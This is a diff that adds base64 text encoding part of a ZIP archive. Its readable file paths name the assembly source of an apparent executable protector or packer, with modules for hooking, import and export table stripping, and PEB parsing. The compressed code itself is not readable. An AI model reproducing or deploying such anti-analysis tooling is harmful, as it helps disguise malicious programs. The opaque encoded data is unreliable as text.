+TRL5gioleLqHmgtUHuOS/gNTyRe3om6iDT2uJtf7rXcPdS9zxB7VStUl4W1E
+t3c0B+3a4EepOGuMYjsdbwiyvWRwiYmIj8edRvOBrVAbqZA9396xN8OXFNxZ
+hhbDQJ1P8X/oyuYvVC4xvwSeuDmlbdP6h5e6kwp6kWnlGWujSRhA7AV3kRyz
+QzE9RUalMwkDU4UFw4yG4QZa+iKjV/lr9lRKojqHugT2MbPLuLGmpKigFONc
+Vp9GPqTts0x6Qr7ZDZW4Sh9QayhwLtvZ1vNL8j3m307cUKk0p30fVbo4b7Bq
+GAINtXeHwdcarWPoTBcRe5ini5vl4+1qtVwRwsa0pfl9HEmBJqUDlALnqi9b
+RXA23+FQ3Uvg92WmQH2feT/0fRKhAfkFzROdtxmlpC7PuvNj7irR2x+Eg9jJ
+75ykuj5k9j2Su51GYwHnatJfAwfTyT1a3y2eGf0+z9Yz2qU368XycWT3AKG6
+SXEhSK067kJ/AlBLAwQKAAAAAAAnisEyAAAAAAAAAAAAAAAAJQAAAFBST1RU
+LVBBQ0svcHJvdHR5LW9sZC9zb3VyY2UvcHJvdHR5MS9QSwMEFAAAAAgAsonB
+MhJNV68DAgAAkwMAAC0AAABQUk9UVC1QQUNLL3Byb3R0eS1vbGQvc291cmNl
+L3Byb3R0eTEvY29uZi5pbmOdUtuO0zAQfU6l/sM87grSdssC1RYhsqnTDeRS
+5YK6QijKxdsYpXaIHdr8PbHTJbywDziyJvacmTnjM2td18H0PcvexoER2b4H
+lu0g/YU1naxfcv8zCHaBH0WP0nxGZgQ65A1OBS4g62BHmGjgPqUkhQ+ZNLNa
+Xn06HFNSzXJ2/ChTlELUd/N5nc14jXOSVoTjYkboE/tfVqIk9MChYy0c0w5O
+KRUgGOCCiLvpRH4OMr6ixIs2jpOg/c4PolDDP1tYaJq2hoIBZQLqhgmcC1Cw
+Wb8Bn2vWCD6daGqtgVDZL8ccSnKoOhAlBi7SjFREdCMsa4VyXeLhRKpK4jpo
+6aUKLgZmoWGhxEWuHzwmrr9BitaNyiJdEKCtFNT03Z0R2N5WxrjGXmJjB4Wa
+wi8V3ovdexSAb8HFCZGvBOuVGrmN3c3hCwo85LxZquPV8ho2yDJi5w96OomR
+lTygOLDDyDYv1QZ2sfdgeBsHbQDtTbR7HruoZ/AcEJoQmobnjcVv9B41h4Xu
+W9bQvyzg+YFrOJdWbt/frrK370olDH5K20pATMuUFlU/Zuic41oQRsEilcDN
+3wkSxwijIctiVap6/ZvL97/q8SdCC3bicK6v+39RwsiqbnkJmJP5kf2S9vU3
+zOtXq+8jQpSMcdwPueilTxsMP1quJO4vCeWiaXNJig89TSe/AVBLAwQUAAAA
+CACcicEycKjX0/oCAADrCQAALwAAAFBST1RULVBBQ0svcHJvdHR5LW9sZC9z
+b3VyY2UvcHJvdHR5MS9leGNlcHQuaW5jnVVbU5tAFH7GGf/DeeibMV6mT0Qd
+acSaTmpSQjq2DsMs7JKsEmBgE5P++p4FuSmSRHiA3T3X73znbA/Gxsg0/8jP
+D71vwjG4MSOCUXA2MOahiOEbCTiBC0d+upHcup4tCPe7bri4OjzowVyISD05
+iZxuEjGXE58njHZ54IV4erzvc3iAWrr2cOmHLhE8DHAZs2TpCxXktmlMdeAe
+cAE8kcJZBrb+0NfH5mB0bxv6d/mZmJphqocHPLFfYi4YcXymKFEculIL/5bJ
+nNDsfxGu4JEl0dF4OrnTUNWY9s2ujf6szmkpwpx1h5G1XLrE9zEAG9Gi0rLc
+EywRgOe5zNM/KDyjoFDkI63l9ojfcTaCQYQwP6JxCw/S0BI2h4unRQQYrhAb
+G9e2F5MFu8pV63od4qemFSVG0e05nWVx1KJTM9dhJEFBQ0xkob4NQS3dbAUO
+McAkam4yo/WisIBGxX6OaFOttqBzftWMLFlbn0AnD2QfcM73R6fq5h0EEhnI
+XLVyffBXv/xyHHpewgS0dkRmaE4Cii7FnCeNOCvXlPmCnMdshqyPslOfkZTe
+SDlMqc2JlbYIJifZeVSV6Y+Mm66+dlkke1ujFHs7sYqO8SEIhV1UiVCaemzL
++7OuZnVXrYRoKv6rtrrL8HirW4O/ZL+kkTtn7nNzTdIRhGjQlzCmKbW9RH08
+tapnkuxHX63qiCoa7YMZNQtDWuJQhJqqP3PfT8O0ZUCIn6L0QMwZsHUk4YQX
+sgERwmIDyfNyOMzyyC02d00lyzJ1stol8x1rvHf2ZFUZ8vv52YJXAQdZqU1g
+lHmXWMh3ybw2QOrtqbxOxvcESVvVnjAxDTLO0d+aYX0AhfTJ1lzIZfXKSwdo
+qSMvQadVhxQSO16TVSutdrZVMzck4ZeYOYTauPeGiB+XqqqvKoNbmOq39p0+
+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
+Xo21d+1Ugp6dULmb0W6YZ9PZmLuzVbtanVLqfwFQSwMEFAAAAAgA8XOJMrFs
+ZbU3AwAAmwgAADEAAABQUk9UVC1QQUNLL3Byb3R0eS1vbGQvc291cmNlL3By
+b3R0eTEvZ3VhcmRpYW4uaW5jxVRdb9MwFH02Ev/hshegakdpX1CL0EoaUBFa
+y9oJEEKRG9+1ZokdYod2/HruTZp267ohjQcaVXHs+3nOue63Wi14fz44G44G
+pzA5GwdTaN3/e/yo/xeLw04cfTb7yq8PYTCDFsQ5So8K5lcw0dbn8FYaLeH1
+nF/HGW+dLFKpk+PYpm84xNL7rPfiRTY/dhnGWibaoTrW5sLSKRucjmdhD6xJ
+rsCvLCTSechyG6MqcnSw0kkCc4SC3Jrgl9osHLDfCnOEeCnNgupZLXWCsMq1
+92QAxpIllaocPPPWgkvs6vkDUaie4TiafgzDiRD4s4C2oF8flDVPPQVHzGBR
+yFxpaeBZaqmwYHIOsTWuSDOvraHkNWXX47xsQxUp1YwLOSjH2epgo6EQSkF7
+txNRwyrBert6GAxCSYMihBXB4S3X1veMGjQqKLYVNppkyQc/0qy1tPaSEGth
+WiSSKwVtnCdzjuoYRmvJ1BpCV/tlHayx5cXgL8wB1xgXJIzHj5yXuY/qXEIw
+lVyjyAq35LCbJdiLC4cedq3WB8FZOJiF0fR8OglPh+F2v32HZ1SVdMuMFyex
+TJI1BKVsZ7Vdan+BWtlcQUYS/raH7fcmynXpu8T4sgPt5lGY5zbvQSCNsUQ4
+t0jI4I70qoQnR1V7NivT5OhFRdA+KGhUVp3sNXENr/IkSqzNehRFjN5BrUEI
+P8HLusubstq1PGVVio265BUzRaUbRNVimgRBO3pXJuoDzZln0ZIjrRekAscj
+6DH25ZrkNBm8D6PT8SAIwumUnNaWSJfrDVTklFWl0gfnB5Kzj6pYtOUpAWBM
+5jGb//jN8sQtIDf0UbJThi5tyy/2VNsvtW7ul1PmTOUlRlx3zYFg4MrgksaF
+Y77i7GkG24LZgv836qEu+kIbD91yusQJ1+Z+w1Gj0SjvRLoMwyHQ11F5XCE+
+LnxW+CHOi8XU5zRUg53Y71HbNcoKuiKNmm2UwMy5asuB9g6TC1dP/C3Z1Iri
+9iOKtsHeHZy/O8jrPIy9zn+kr3OIvk5P7M/hQWhqzBT+C2rdh6HWfSBq4Zcw
+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
+3CiBjq3SButWINbCuhFkwiiqqsiJ3cYjia3YbOzfz4am0O5FA+0Syfb57nnu
+uXPPdV245DPFSrROmNRcFB5XkugkZSX4QXCJsPvI6rWee7CZJEDjEC+64IyD
+MbJnjMIZHk+7leMoVAvUaDRg6gc4BA9Nh3g0CUfB2Hq79wG+EEvQKfuLUi3g
+lmfa7EiW2RxWBakW9DMlQGlS6pVU8MlDLztHd2GCgzBc2OUjGobgQlIyohmF
++AdMuNAlDEjBCbyN7dKS1nVxlxOetRKRv7MQqday227LuKUkSzjJuGK0xYtb
+cWRV9ZqOM9g3Gm/Xzumr10BXEp69f27PPeCFaVJBsm0bgBJNLMCSR6npcqSY
+6ZHjOLIUSb3mmF+uVEqojXEuKMs06ZTsDlgsraviyxgBRtbNa+M/McXc3Cda
+5y4qMbMByhVRecQLrjegufgGjK6bk/4HFGHU9+Z4FKLqIlk3z6q9waffRUlB
+mi5vmKI/PghbwIYuJ0sWGTX7ZPwwnEfiIv8fOb+ucun8qhBdoeEs3Cr9/yK3
+hFJIOzGnZPp3s2UF3Qxv+/VQ/+rc3oOdObQBeaPzuY+wmcFOyMOLqJ6D8zn4
+Ymc6WIQIJiGGa5N304RT9CaFA8wgTWcDuzN1NC35E8/ZjsubB9h7IIMTeGEI
+TdBTyftlW7E/AVBLAwQUAAAACABzWXkyLXkaxDAEAABPEAAAMQAAAFBST1RU
+LVBBQ0svcHJvdHR5LW9sZC9zb3VyY2UvcHJvdHR5MS9MREUzMkJJTi5JTkON
+V8tu3DAMvBfoP/jWS7e1bPnVnPwEChT9hSJB3NhAswG6e+rX1xyKetjaJEAg
+7K6G5HBIUcpd8mMY86z7/vPL9599cjolP+bz03U5Devl/nKZnx/+zH+T8fy0
+nufk69c8Oz2s148f7pKn+Tz/vb/Oj8nv9c/8JXl8Sc4v12R+5O1Tcl3WS7L9
+/UufH9b504UDJTO7OiUfPzxSiOdf63m9ftu+PSRpXy+f0zQNlpKWutuWaqDf
+6oWxU799G2FQRKzUtvSNwfYZ/a5lM89pkz4V/sLY0nJoW1nYJW2oaVuGVjjQ
+t3SSzZaWrtqWqaHFbHjYipaJ+OaltbJhNoiH3W26RRgytg6pFoe0vNzwrQSs
+EEf4NA1CTgU6AIuMqiqw0iRmoQ12pN9rLZugryuBae3rUFPi00h8O/kEq4w4
+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
